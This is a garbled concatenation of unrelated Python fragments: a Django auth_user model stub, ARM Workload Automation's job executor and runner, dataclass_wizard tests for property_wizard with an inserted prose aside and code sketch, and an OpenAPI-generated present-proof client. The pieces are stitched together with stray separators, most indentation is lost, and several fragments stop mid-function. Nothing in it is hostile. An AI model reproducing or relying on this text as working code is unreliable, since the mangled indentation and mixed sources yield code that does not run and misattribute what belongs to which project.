is_superuser = models.BooleanField()
username = models.CharField(unique=True, max_length=150)
first_name = models.CharField(max_length=30)
last_name = models.CharField(max_length=150)
email = models.CharField(max_length=254)
is_staff = models.BooleanField()
is_active = models.BooleanField()
date_joined = models.DateTimeField()
class Meta:
managed = False
db_table = 'auth_user'
# Copyright 2013-2015 ARM Limited
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# pylint: disable=no-member
import logging
import os
import shutil
from copy import copy
from datetime import datetime
import wa.framework.signal as signal
from wa.framework import instrument
from wa.framework.configuration.core import Status
from wa.framework.exception import TargetError, HostError, WorkloadError,\
TargetNotRespondingError, TimeoutError
from wa.framework.job import Job
from wa.framework.output import init_job_output
from wa.framework.output_processor import ProcessorManager
from wa.framework.resource import ResourceResolver
from wa.framework.target.manager import TargetManager
from wa.utils import log
from wa.utils.misc import merge_config_values, format_duration
class ExecutionContext(object):
@property
def previous_job(self):
    if not self.completed_jobs:
        return None
    return self.completed_jobs[-1]
@property
def next_job(self):
    if not self.job_queue:
        return None
    return self.job_queue[0]
@property
def spec_changed(self):
if self.previous_job is None and self.current_job is not None: # Start of run
return True
if self.previous_job is not None and self.current_job is None: # End of run
return True
return self.current_job.spec.id != self.previous_job.spec.id
@property
def spec_will_change(self):
if self.current_job is None and self.next_job is not None: # Start of run
return True
if self.current_job is not None and self.next_job is None: # End of run
return True
return self.current_job.spec.id != self.next_job.spec.id
@property
def workload(self):
if self.current_job:
return self.current_job.workload
@property
def job_output(self):
if self.current_job:
return self.current_job.output
@property
def output(self):
if self.current_job:
return self.job_output
return self.run_output
@property
def output_directory(self):
return self.output.basepath
def __init__(self, cm, tm, output):
self.logger = logging.getLogger('context')
self.cm = cm
self.tm = tm
self.run_output = output
self.run_state = output.state
self.target_info = self.tm.get_target_info()
self.logger.debug('Loading resource discoverers')
self.resolver = ResourceResolver(cm.plugin_cache)
self.resolver.load()
self.job_queue = None
self.completed_jobs = None
self.current_job = None
self.successful_jobs = 0
self.failed_jobs = 0
self.run_interrupted = False
def start_run(self):
self.output.info.start_time = datetime.utcnow()
self.output.write_info()
self.job_queue = copy(self.cm.jobs)
self.completed_jobs = []
self.run_state.status = Status.STARTED
self.output.status = Status.STARTED
self.output.write_state()
def end_run(self):
if self.successful_jobs:
if self.failed_jobs:
status = Status.PARTIAL
else:
status = Status.OK
else:
status = Status.FAILED
self.run_state.status = status
self.run_output.status = status
self.run_output.info.end_time = datetime.utcnow()
self.run_output.info.duration = self.run_output.info.end_time -\
self.run_output.info.start_time
self.run_output.write_info()
self.run_output.write_state()
self.run_output.write_result()
def finalize(self):
self.tm.finalize()
def start_job(self):
if not self.job_queue:
raise RuntimeError('No jobs to run')
self.current_job = self.job_queue.pop(0)
job_output = init_job_output(self.run_output, self.current_job)
self.current_job.set_output(job_output)
self.update_job_state(self.current_job)
self.tm.start()
return self.current_job
def end_job(self):
if not self.current_job:
raise RuntimeError('No jobs in progress')
self.tm.stop()
self.completed_jobs.append(self.current_job)
self.update_job_state(self.current_job)
self.output.write_result()
self.current_job = None
def set_status(self, status, force=False):
if not self.current_job:
raise RuntimeError('No jobs in progress')
self.current_job.set_status(status, force)
def extract_results(self):
self.tm.extract_results(self)
def move_failed(self, job):
self.run_output.move_failed(job.output)
def update_job_state(self, job):
self.run_state.update_job(job)
self.run_output.write_state()
def skip_job(self, job):
job.status = Status.SKIPPED
self.run_state.update_job(job)
self.completed_jobs.append(job)
def skip_remaining_jobs(self):
while self.job_queue:
job = self.job_queue.pop(0)
self.skip_job(job)
self.write_state()
def write_state(self):
self.run_output.write_state()
def get_metric(self, name):
try:
return self.output.get_metric(name)
except HostError:
if not self.current_job:
raise
return self.run_output.get_metric(name)
def add_metric(self, name, value, units=None, lower_is_better=False,
classifiers=None):
if self.current_job:
classifiers = merge_config_values(self.current_job.classifiers,
classifiers)
self.output.add_metric(name, value, units, lower_is_better, classifiers)
def get_artifact(self, name):
try:
return self.output.get_artifact(name)
except HostError:
if not self.current_job:
raise
return self.run_output.get_artifact(name)
def get_artifact_path(self, name):
try:
return self.output.get_artifact_path(name)
except HostError:
if not self.current_job:
raise
return self.run_output.get_artifact_path(name)
def add_artifact(self, name, path, kind, description=None, classifiers=None):
self.output.add_artifact(name, path, kind, description, classifiers)
def add_run_artifact(self, name, path, kind, description=None,
classifiers=None):
self.run_output.add_artifact(name, path, kind, description, classifiers)
def add_event(self, message):
self.output.add_event(message)
def take_screenshot(self, filename):
filepath = self._get_unique_filepath(filename)
self.tm.target.capture_screen(filepath)
self.add_artifact('screenshot', filepath, kind='log')
def take_uiautomator_dump(self, filename):
filepath = self._get_unique_filepath(filename)
self.tm.target.capture_ui_hierarchy(filepath)
self.add_artifact('uitree', filepath, kind='log')
def record_ui_state(self, basename):
self.logger.info('Recording screen state...')
self.take_screenshot('{}.png'.format(basename))
target = self.tm.target
if target.os == 'android' or\
(target.os == 'chromeos' and target.has('android_container')):
self.take_uiautomator_dump('{}.uix'.format(basename))
def initialize_jobs(self):
new_queue = []
failed_ids = []
for job in self.job_queue:
if job.id in failed_ids:
# Don't try to initialize a job if another job with the same ID
# (i.e. same job spec) has failed - we can assume it will fail
# too.
self.skip_job(job)
continue
try:
job.initialize(self)
except WorkloadError as e:
job.set_status(Status.FAILED)
log.log_error(e, self.logger)
failed_ids.append(job.id)
if self.cm.run_config.bail_on_init_failure:
raise
else:
new_queue.append(job)
self.job_queue = new_queue
def _get_unique_filepath(self, filename):
filepath = os.path.join(self.output_directory, filename)
rest, ext = os.path.splitext(filepath)
i = 1
new_filepath = '{}-{}{}'.format(rest, i, ext)
if not os.path.exists(filepath) and not os.path.exists(new_filepath):
return filepath
elif not os.path.exists(new_filepath):
# new_filepath does not exist, therefore filepath must exist.
# this is the first collision
shutil.move(filepath, new_filepath)
while os.path.exists(new_filepath):
i += 1
new_filepath = '{}-{}{}'.format(rest, i, ext)
return new_filepath
class Executor(object):
"""
The ``Executor``'s job is to set up the execution context and pass it to a
``Runner`` along with a loaded run specification. Once the ``Runner`` has
done its thing, the ``Executor`` performs some final reporting before
returning.
The initial context setup involves combining configuration from various
sources, loading of required workloads, loading and installation of
instruments and output processors, etc. Static validation of the combined
configuration is also performed.
"""
# pylint: disable=R0915
def __init__(self):
self.logger = logging.getLogger('executor')
self.error_logged = False
self.warning_logged = False
self.target_manager = None
self.device = None
def execute(self, config_manager, output):
"""
Execute the run specified by an agenda. Optionally, selectors may be
used to execute only a subset of the specified agenda.
Params::
:config_manager: a ``ConfigManager`` containing processed configuration
:output: an initialized ``RunOutput`` that will be used to
store the results.
"""
signal.connect(self._error_signalled_callback, signal.ERROR_LOGGED)
signal.connect(self._warning_signalled_callback, signal.WARNING_LOGGED)
self.logger.info('Initializing run')
self.logger.debug('Finalizing run configuration.')
config = config_manager.finalize()
output.write_config(config)
self.logger.info('Connecting to target')
self.target_manager = TargetManager(config.run_config.device,
config.run_config.device_config,
output.basepath)
output.set_target_info(self.target_manager.get_target_info())
self.logger.info('Initializing execution context')
context = ExecutionContext(config_manager, self.target_manager, output)
self.logger.info('Generating jobs')
config_manager.generate_jobs(context)
output.write_job_specs(config_manager.job_specs)
output.write_state()
self.logger.info('Installing instruments')
for instrument_name in config_manager.get_instruments(self.target_manager.target):
instrument.install(instrument_name, context)
instrument.validate()
self.logger.info('Installing output processors')
pm = ProcessorManager()
for proc in config_manager.get_processors():
pm.install(proc, context)
pm.validate()
self.logger.info('Starting run')
runner = Runner(context, pm)
signal.send(signal.RUN_STARTED, self)
runner.run()
context.finalize()
self.execute_postamble(context, output)
signal.send(signal.RUN_COMPLETED, self)
def execute_postamble(self, context, output):
self.logger.info('Done.')
duration = format_duration(output.info.duration)
self.logger.info('Run duration: {}'.format(duration))
num_ran = context.run_state.num_completed_jobs
status_summary = 'Ran a total of {} iterations: '.format(num_ran)
counter = context.run_state.get_status_counts()
parts = []
for status in reversed(Status.levels):
if status in counter:
parts.append('{} {}'.format(counter[status], status))
self.logger.info(status_summary + ', '.join(parts))
self.logger.info('Results can be found in {}'.format(output.basepath))
if self.error_logged:
    self.logger.warning('There were errors during execution.')
    self.logger.warning('Please see {}'.format(output.logfile))
elif self.warning_logged:
    self.logger.warning('There were warnings during execution.')
    self.logger.warning('Please see {}'.format(output.logfile))
def _error_signalled_callback(self, record):
self.error_logged = True
signal.disconnect(self._error_signalled_callback, signal.ERROR_LOGGED)
def _warning_signalled_callback(self, record):
self.warning_logged = True
signal.disconnect(self._warning_signalled_callback, signal.WARNING_LOGGED)
class Runner(object):
"""
Triggers running jobs and processing results
Takes a pre-initialized ExecutionContext and ProcessorManager. Handles
actually running the jobs, and triggers the ProcessorManager to handle
processing job and run results.
"""
def __init__(self, context, pm):
self.logger = logging.getLogger('runner')
self.context = context
self.pm = pm
self.output = self.context.output
self.config = self.context.cm
def run(self):
try:
self.initialize_run()
self.send(signal.RUN_INITIALIZED)
while self.context.job_queue:
if self.context.run_interrupted:
raise KeyboardInterrupt()
with signal.wrap('JOB_EXECUTION', self, self.context):
self.run_next_job(self.context)
except KeyboardInterrupt as e:
log.log_error(e, self.logger)
self.logger.info('Skipping remaining jobs.')
self.context.skip_remaining_jobs()
except Exception as e:
message = getattr(e, 'message', None) or str(e)
log.log_error(e, self.logger)
self.logger.error('Skipping remaining jobs due to "{}".'.format(message))
self.context.skip_remaining_jobs()
raise e
finally:
self.finalize_run()
self.send(signal.RUN_FINALIZED)
def initialize_run(self):
self.logger.info('Initializing run')
signal.connect(self._error_signalled_callback, signal.ERROR_LOGGED)
signal.connect(self._warning_signalled_callback, signal.WARNING_LOGGED)
self.context.start_run()
self.pm.initialize()
log.indent()
self.context.initialize_jobs()
log.dedent()
self.context.write_state()
def finalize_run(self):
self.logger.info('Finalizing run')
self.context.end_run()
self.pm.enable_all()
self.pm.process_run_output(self.context)
self.pm.export_run_output(self.context)
self.pm.finalize()
log.indent()
for job in self.context.completed_jobs:
job.finalize(self.context)
log.dedent()
signal.disconnect(self._error_signalled_callback, signal.ERROR_LOGGED)
signal.disconnect(self._warning_signalled_callback, signal.WARNING_LOGGED)
def run_next_job(self, context):
job = context.start_job()
self.logger.info('Running job {}'.format(job.id))
try:
log.indent()
self.do_run_job(job, context)
job.set_status(Status.OK)
except (Exception, KeyboardInterrupt) as e: # pylint: disable=broad-except
log.log_error(e, self.logger)
if isinstance(e, KeyboardInterrupt):
context.run_interrupted = True
job.set_status(Status.ABORTED)
raise e
else:
job.set_status(Status.FAILED)
if isinstance(e, TargetNotRespondingError):
raise e
elif isinstance(e, TargetError):
context.tm.verify_target_responsive()
finally:
self.logger.info('Completing job {}'.format(job.id))
self.send(signal.JOB_COMPLETED)
context.end_job()
log.dedent()
self.check_job(job)
def do_run_job(self, job, context):
rc = self.context.cm.run_config
if job.workload.phones_home and not rc.allow_phone_home:
self.logger.warning('Skipping job {} ({}) due to allow_phone_home=False'
.format(job.id, job.workload.name))
self.context.skip_job(job)
return
job.set_status(Status.RUNNING)
self.send(signal.JOB_STARTED)
self.logger.info('Configuring augmentations')
job.configure_augmentations(context, self.pm)
with signal.wrap('JOB_TARGET_CONFIG', self, context):
job.configure_target(context)
try:
with signal.wrap('JOB_SETUP', self, context):
job.setup(context)
except Exception as e:
job.set_status(Status.FAILED)
log.log_error(e, self.logger)
if isinstance(e, TargetError) or isinstance(e, TimeoutError):
context.tm.verify_target_responsive()
self.context.record_ui_state('setup-error')
raise e
try:
try:
with signal.wrap('JOB_EXECUTION', self, context):
job.run(context)
except KeyboardInterrupt:
context.run_interrupted = True
job.set_status(Status.ABORTED)
raise
except Exception as e:
job.set_status(Status.FAILED)
log.log_error(e, self.logger)
if isinstance(e, TargetError) or isinstance(e, TimeoutError):
context.tm.verify_target_responsive()
self.context.record_ui_state('run-error')
raise e
finally:
try:
with signal.wrap('JOB_OUTPUT_PROCESSED', self, context):
job.process_output(context)
self.pm.process_job_output(context)
self.pm.export_job_output(context)
except Exception as e:
| |
import logging
from collections import defaultdict
from dataclasses import dataclass, field
from datetime import datetime
from typing import Union, List, ClassVar, DefaultDict, Set
import pytest
from dataclass_wizard import property_wizard
from ..conftest import Literal, Annotated, PY39_OR_ABOVE, PY310_OR_ABOVE
log = logging.getLogger(__name__)
def test_property_wizard_does_not_affect_normal_properties():
"""
The `property_wizard` should not otherwise affect normal properties (i.e. ones
that don't have their property names, or underscored names, annotated as a
dataclass field).
"""
@dataclass
class Vehicle(metaclass=property_wizard):
def __post_init__(self):
self.wheels = 4
self._my_prop = 0
@property
def wheels(self) -> int:
return self._wheels
@wheels.setter
def wheels(self, wheels: Union[int, str]):
self._wheels = int(wheels)
@property
def _my_prop(self) -> int:
return self.my_prop
@_my_prop.setter
def _my_prop(self, my_prop: Union[int, str]):
self.my_prop = int(my_prop) + 5
v = Vehicle()
log.debug(v)
assert v.wheels == 4
assert v._my_prop == 5
# These should all result in a `TypeError`, as neither `wheels` nor
# `_my_prop` are valid arguments to the constructor, as they are just
# normal properties.
with pytest.raises(TypeError):
_ = Vehicle(wheels=3)
with pytest.raises(TypeError):
_ = Vehicle('6')
with pytest.raises(TypeError):
_ = Vehicle(_my_prop=2)
v.wheels = '123'
assert v.wheels == 123, 'Expected assignment to use the setter method'
v._my_prop = '5'
assert v._my_prop == 10, 'Expected assignment to use the setter method'
def test_property_wizard_does_not_affect_read_only_properties():
"""
The `property_wizard` should not otherwise affect properties which are
read-only (i.e. ones which don't define a `setter` method)
"""
@dataclass
class Vehicle(metaclass=property_wizard):
list_of_wheels: list = field(default_factory=list)
@property
def wheels(self) -> int:
return len(self.list_of_wheels)
v = Vehicle()
log.debug(v)
assert v.wheels == 0
# AttributeError: can't set attribute
with pytest.raises(AttributeError):
v.wheels = 3
v = Vehicle(list_of_wheels=[1, 2, 1])
assert v.wheels == 3
v.list_of_wheels = [0]
assert v.wheels == 1
def test_property_wizard_does_not_error_when_forward_refs_are_declared():
"""
Using `property_wizard` when the dataclass has a forward reference
defined in a type annotation.
"""
@dataclass
class Vehicle(metaclass=property_wizard):
fire_truck: 'Truck'
cars: List['Car'] = field(default_factory=list)
_wheels: Union[int, str] = 4
@property
def wheels(self) -> int:
return self._wheels
@wheels.setter
def wheels(self, wheels: Union[int, str]):
self._wheels = int(wheels)
@dataclass
class Car:
tires: int
@dataclass
class Truck:
color: str
truck = Truck('red')
v = Vehicle(fire_truck=truck)
log.debug(v)
assert v.wheels == 4
v = Vehicle(fire_truck=truck, wheels=3)
log.debug(v)
assert v.wheels == 3
v = Vehicle(truck, [Car(4)], '6')
log.debug(v)
assert v.wheels == 6, 'The constructor should use our setter method'
v.wheels = '123'
assert v.wheels == 123, 'Expected assignment to use the setter method'
def test_property_wizard_with_public_property_and_underscored_field():
"""
Using `property_wizard` when the dataclass has an public property and an
underscored field name.
"""
@dataclass
class Vehicle(metaclass=property_wizard):
_wheels: Union[int, str] = 4
@property
def wheels(self) -> int:
return self._wheels
@wheels.setter
def wheels(self, wheels: Union[int, str]):
self._wheels = int(wheels)
v = Vehicle()
log.debug(v)
assert v.wheels == 4
# Note that my IDE complains here, and suggests `_wheels` as a possible
# keyword argument to the constructor method; however, that's wrong and
# will error if you try it that way.
v = Vehicle(wheels=3)
log.debug(v)
assert v.wheels == 3
v = Vehicle('6')
log.debug(v)
assert v.wheels == 6, 'The constructor should use our setter method'
v.wheels = '123'
assert v.wheels == 123, 'Expected assignment to use the setter method'
def test_property_wizard_with_public_property_and_field():
"""
Using `property_wizard` when the dataclass has both a property and field
name *without* a leading underscore.
"""
@dataclass
class Vehicle(metaclass=property_wizard):
# The value of `wheels` here will be ignored, since `wheels` is simply
# re-assigned on the following property definition.
wheels: Union[int, str] = 4
@property
def wheels(self) -> int:
return self._wheels
@wheels.setter
def wheels(self, wheels: Union[int, str]):
self._wheels = int(wheels)
v = Vehicle()
log.debug(v)
assert v.wheels == 0
v = Vehicle(wheels=3)
log.debug(v)
assert v.wheels == 3
v = Vehicle('6')
log.debug(v)
assert v.wheels == 6, 'The constructor should use our setter method'
v.wheels = '123'
assert v.wheels == 123, 'Expected assignment to use the setter method'
@pytest.mark.skipif(not PY310_OR_ABOVE, reason='requires Python 3.10 or higher')
def test_property_wizard_with_public_property_and_field_with_or():
"""
Using `property_wizard` when the dataclass has both a property and field
name *without* a leading underscore, and using the OR ("|") operator in
Python 3.10+, instead of the `typing.Union` usage.
"""
@dataclass
class Vehicle(metaclass=property_wizard):
# The value of `wheels` here will be ignored, since `wheels` is simply
# re-assigned on the following property definition.
wheels: int | str = 4
@property
def wheels(self) -> int:
return self._wheels
@wheels.setter
def wheels(self, wheels: Union[int, str]):
self._wheels = int(wheels)
v = Vehicle()
log.debug(v)
assert v.wheels == 0
v = Vehicle(wheels=3)
log.debug(v)
assert v.wheels == 3
v = Vehicle('6')
log.debug(v)
assert v.wheels == 6, 'The constructor should use our setter method'
v.wheels = '123'
assert v.wheels == 123, 'Expected assignment to use the setter method'
def test_property_wizard_with_underscored_property_and_public_field():
"""
Using `property_wizard` when the dataclass has an underscored property and
a public field name.
"""
@dataclass
class Vehicle(metaclass=property_wizard):
wheels: Union[int, str] = 4
@property
def _wheels(self) -> int:
return self._wheels
@_wheels.setter
def _wheels(self, wheels: Union[int, str]):
self._wheels = int(wheels)
v = Vehicle()
log.debug(v)
assert v.wheels == 4
v = Vehicle(wheels=3)
log.debug(v)
assert v.wheels == 3
v = Vehicle('6')
log.debug(v)
assert v.wheels == 6, 'The constructor should use our setter method'
v.wheels = '123'
assert v.wheels == 123, 'Expected assignment to use the setter method'
def test_property_wizard_with_underscored_property_and_field():
"""
Using `property_wizard` when the dataclass has both a property and field
name with a leading underscore.
Note: this approach is generally *not* recommended, because the IDE won't
know that the property or field name will be transformed to a public field
name without the leading underscore, so it won't offer the desired type
hints and auto-completion here.
"""
@dataclass
class Vehicle(metaclass=property_wizard):
# The value of `_wheels` here will be ignored, since `_wheels` is
# simply re-assigned on the following property definition.
_wheels: Union[int, str] = 4
@property
def _wheels(self) -> int:
return self._wheels
@_wheels.setter
def _wheels(self, wheels: Union[int, str]):
self._wheels = int(wheels)
v = Vehicle()
log.debug(v)
assert v.wheels == 0
# Note that my IDE complains here, and suggests `_wheels` as a possible
# keyword argument to the constructor method; however, that's wrong and
# will error if you try it that way.
v = Vehicle(wheels=3)
log.debug(v)
assert v.wheels == 3
v = Vehicle('6')
log.debug(v)
assert v.wheels == 6, 'The constructor should use our setter method'
v.wheels = '123'
assert v.wheels == 123, 'Expected assignment to use the setter method'
def test_property_wizard_with_public_property_and_annotated_field():
"""
Using `property_wizard` when the dataclass has both a property and field
name *without* a leading underscore, and the field is a
:class:`typing.Annotated` type.
"""
@dataclass
class Vehicle(metaclass=property_wizard):
# The value of `wheels` here will be ignored, since `wheels` is simply
# re-assigned on the following property definition.
wheels: Annotated[Union[int, str], field(default=4)] = None
@property
def wheels(self) -> int:
return self._wheels
@wheels.setter
def wheels(self, wheels: Union[int, str]):
self._wheels = int(wheels)
v = Vehicle()
log.debug(v)
assert v.wheels == 4
v = Vehicle(wheels=3)
log.debug(v)
assert v.wheels == 3
v = Vehicle('6')
log.debug(v)
assert v.wheels == 6, 'The constructor should use our setter method'
v.wheels = '123'
assert v.wheels == 123, 'Expected assignment to use the setter method'
def test_property_wizard_with_private_property_and_annotated_field_with_no_useful_extras():
"""
Using `property_wizard` when the dataclass has both a property and field
name with a leading underscore, and the field is a
:class:`typing.Annotated` type without any extras that are a
:class:`dataclasses.Field` type.
"""
@dataclass
class Vehicle(metaclass=property_wizard):
# The value of `wheels` here will be ignored, since `wheels` is simply
# re-assigned on the following property definition.
_wheels: Annotated[Union[int, str], 'Hello world!', 123] = None
@property
def _wheels(self) -> int:
return self._wheels
@_wheels.setter
def _wheels(self, wheels: Union[int, str]):
self._wheels = int(wheels)
v = Vehicle()
log.debug(v)
assert v.wheels == 0
v = Vehicle(wheels=3)
log.debug(v)
assert v.wheels == 3
v = Vehicle('6')
log.debug(v)
assert v.wheels == 6, 'The constructor should use our setter method'
v.wheels = '123'
assert v.wheels == 123, 'Expected assignment to use the setter method'
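For contrast with the metaclass approach these tests exercise, here is a hedged sketch of the plain standard-library workaround. The class below is hypothetical and only mirrors what the tests expect; note it keeps the IDE drawback (a `_wheels` constructor argument) that the docstrings above describe.

```python
from dataclasses import dataclass
from typing import Union

@dataclass
class Vehicle:
    # The field keeps the leading underscore, so the constructor argument
    # is `_wheels` -- exactly the IDE drawback described above.
    _wheels: Union[int, str] = 4

    def __post_init__(self):
        # Route the constructor value through the coercing setter.
        self.wheels = self._wheels

    @property
    def wheels(self) -> int:
        return self._wheels

    @wheels.setter
    def wheels(self, wheels: Union[int, str]):
        self._wheels = int(wheels)

assert Vehicle().wheels == 4
assert Vehicle('6').wheels == 6
```

`property_wizard` removes this boilerplate and exposes the public `wheels` name in the constructor instead.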
def test_property_wizard_with_multiple_inheritance():
"""
When using multiple inheritance or when extending from more than one
class, and if any of the super classes define properties that should also
be `dataclass` fields, then the recommended approach is to define the
`property_wizard` metaclass on each class that has such properties. Note
that the last class in the below | |
_return_http_data_only (bool): response data only, without status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (int/float/tuple): timeout setting for this request. If
one number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done on the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done on the data received from the server.
Default is True.
_spec_property_naming (bool): True if the variable names in the input data
are serialized names, as specified in the OpenAPI document.
False if the variable names in the input data
are pythonic names, e.g. snake case (default)
_content_type (str/None): force body content-type.
Default is None and content-type will be predicted by allowed
content-types and body.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
V10PresentationExchangeList
If the method is called asynchronously, returns the request
thread.
"""
kwargs["async_req"] = kwargs.get("async_req", False)
kwargs["_return_http_data_only"] = kwargs.get("_return_http_data_only", True)
kwargs["_preload_content"] = kwargs.get("_preload_content", True)
kwargs["_request_timeout"] = kwargs.get("_request_timeout", None)
kwargs["_check_input_type"] = kwargs.get("_check_input_type", True)
kwargs["_check_return_type"] = kwargs.get("_check_return_type", True)
kwargs["_spec_property_naming"] = kwargs.get("_spec_property_naming", False)
kwargs["_content_type"] = kwargs.get("_content_type")
kwargs["_host_index"] = kwargs.get("_host_index")
return self.present_proof_records_get_endpoint.call_with_http_info(**kwargs)
def present_proof_records_pres_ex_id_credentials_get(self, pres_ex_id, **kwargs):
"""Fetch credentials for a presentation request from wallet # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.present_proof_records_pres_ex_id_credentials_get(pres_ex_id, async_req=True)
>>> result = thread.get()
Args:
pres_ex_id (str): Presentation exchange identifier
Keyword Args:
count (str): Maximum number to retrieve. [optional]
extra_query (str): (JSON) object mapping referents to extra WQL queries. [optional]
referent (str): Proof request referents of interest, comma-separated. [optional]
start (str): Start index. [optional]
_return_http_data_only (bool): response data only, without status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (int/float/tuple): timeout setting for this request. If
one number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done on the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done on the data received from the server.
Default is True.
_spec_property_naming (bool): True if the variable names in the input data
are serialized names, as specified in the OpenAPI document.
False if the variable names in the input data
are pythonic names, e.g. snake case (default)
_content_type (str/None): force body content-type.
Default is None and content-type will be predicted by allowed
content-types and body.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
[IndyCredPrecis]
If the method is called asynchronously, returns the request
thread.
"""
kwargs["async_req"] = kwargs.get("async_req", False)
kwargs["_return_http_data_only"] = kwargs.get("_return_http_data_only", True)
kwargs["_preload_content"] = kwargs.get("_preload_content", True)
kwargs["_request_timeout"] = kwargs.get("_request_timeout", None)
kwargs["_check_input_type"] = kwargs.get("_check_input_type", True)
kwargs["_check_return_type"] = kwargs.get("_check_return_type", True)
kwargs["_spec_property_naming"] = kwargs.get("_spec_property_naming", False)
kwargs["_content_type"] = kwargs.get("_content_type")
kwargs["_host_index"] = kwargs.get("_host_index")
kwargs["pres_ex_id"] = pres_ex_id
return self.present_proof_records_pres_ex_id_credentials_get_endpoint.call_with_http_info(
**kwargs
)
def present_proof_records_pres_ex_id_delete(self, pres_ex_id, **kwargs):
"""Remove an existing presentation exchange record # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.present_proof_records_pres_ex_id_delete(pres_ex_id, async_req=True)
>>> result = thread.get()
Args:
pres_ex_id (str): Presentation exchange identifier
Keyword Args:
_return_http_data_only (bool): response data only, without status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (int/float/tuple): timeout setting for this request. If
one number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done on the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done on the data received from the server.
Default is True.
_spec_property_naming (bool): True if the variable names in the input data
are serialized names, as specified in the OpenAPI document.
False if the variable names in the input data
are pythonic names, e.g. snake case (default)
_content_type (str/None): force body content-type.
Default is None and content-type will be predicted by allowed
content-types and body.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
bool, date, datetime, dict, float, int, list, str, none_type
If the method is called asynchronously, returns the request
thread.
"""
kwargs["async_req"] = kwargs.get("async_req", False)
kwargs["_return_http_data_only"] = kwargs.get("_return_http_data_only", True)
kwargs["_preload_content"] = kwargs.get("_preload_content", True)
kwargs["_request_timeout"] = kwargs.get("_request_timeout", None)
kwargs["_check_input_type"] = kwargs.get("_check_input_type", True)
kwargs["_check_return_type"] = kwargs.get("_check_return_type", True)
kwargs["_spec_property_naming"] = kwargs.get("_spec_property_naming", False)
kwargs["_content_type"] = kwargs.get("_content_type")
kwargs["_host_index"] = kwargs.get("_host_index")
kwargs["pres_ex_id"] = pres_ex_id
return (
self.present_proof_records_pres_ex_id_delete_endpoint.call_with_http_info(
**kwargs
)
)
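The kwargs blocks repeated in every generated method all implement the same defaulting pattern. A minimal sketch of the equivalent `setdefault` form (the names `_CALL_DEFAULTS` and `with_call_defaults` are invented here for illustration, not part of the generated client):

```python
# Each generated method merges caller-supplied kwargs over a fixed set
# of defaults before dispatching; kwargs["k"] = kwargs.get("k", default)
# and kwargs.setdefault("k", default) are equivalent.
_CALL_DEFAULTS = {
    "async_req": False,
    "_return_http_data_only": True,
    "_preload_content": True,
    "_request_timeout": None,
    "_check_input_type": True,
    "_check_return_type": True,
    "_spec_property_naming": False,
    "_content_type": None,
    "_host_index": None,
}

def with_call_defaults(**kwargs):
    for key, value in _CALL_DEFAULTS.items():
        kwargs.setdefault(key, value)
    return kwargs

merged = with_call_defaults(async_req=True)
# the caller's override wins; everything else gets the default
assert merged["async_req"] is True and merged["_preload_content"] is True
```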
def present_proof_records_pres_ex_id_get(self, pres_ex_id, **kwargs):
"""Fetch a single presentation exchange record # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.present_proof_records_pres_ex_id_get(pres_ex_id, async_req=True)
>>> result = thread.get()
Args:
pres_ex_id (str): Presentation exchange identifier
Keyword Args:
_return_http_data_only (bool): response data only, without status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (int/float/tuple): timeout setting for this request. If
one number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done on the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done on the data received from the server.
Default is True.
_spec_property_naming (bool): True if the variable names in the input data
are serialized names, as specified in the OpenAPI document.
False if the variable names in the input data
are pythonic names, e.g. snake case (default)
_content_type (str/None): force body content-type.
Default is None and content-type will be predicted by allowed
content-types and body.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
V10PresentationExchange
If the method is called asynchronously, returns the request
thread.
"""
kwargs["async_req"] = kwargs.get("async_req", False)
kwargs["_return_http_data_only"] = kwargs.get("_return_http_data_only", True)
kwargs["_preload_content"] = kwargs.get("_preload_content", True)
kwargs["_request_timeout"] = kwargs.get("_request_timeout", None)
kwargs["_check_input_type"] = kwargs.get("_check_input_type", True)
kwargs["_check_return_type"] = kwargs.get("_check_return_type", True)
kwargs["_spec_property_naming"] = kwargs.get("_spec_property_naming", False)
kwargs["_content_type"] = kwargs.get("_content_type")
kwargs["_host_index"] = kwargs.get("_host_index")
kwargs["pres_ex_id"] = pres_ex_id
return self.present_proof_records_pres_ex_id_get_endpoint.call_with_http_info(
**kwargs
)
def present_proof_records_pres_ex_id_problem_report_post(
self, pres_ex_id, **kwargs
):
"""Send a problem report for presentation exchange # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
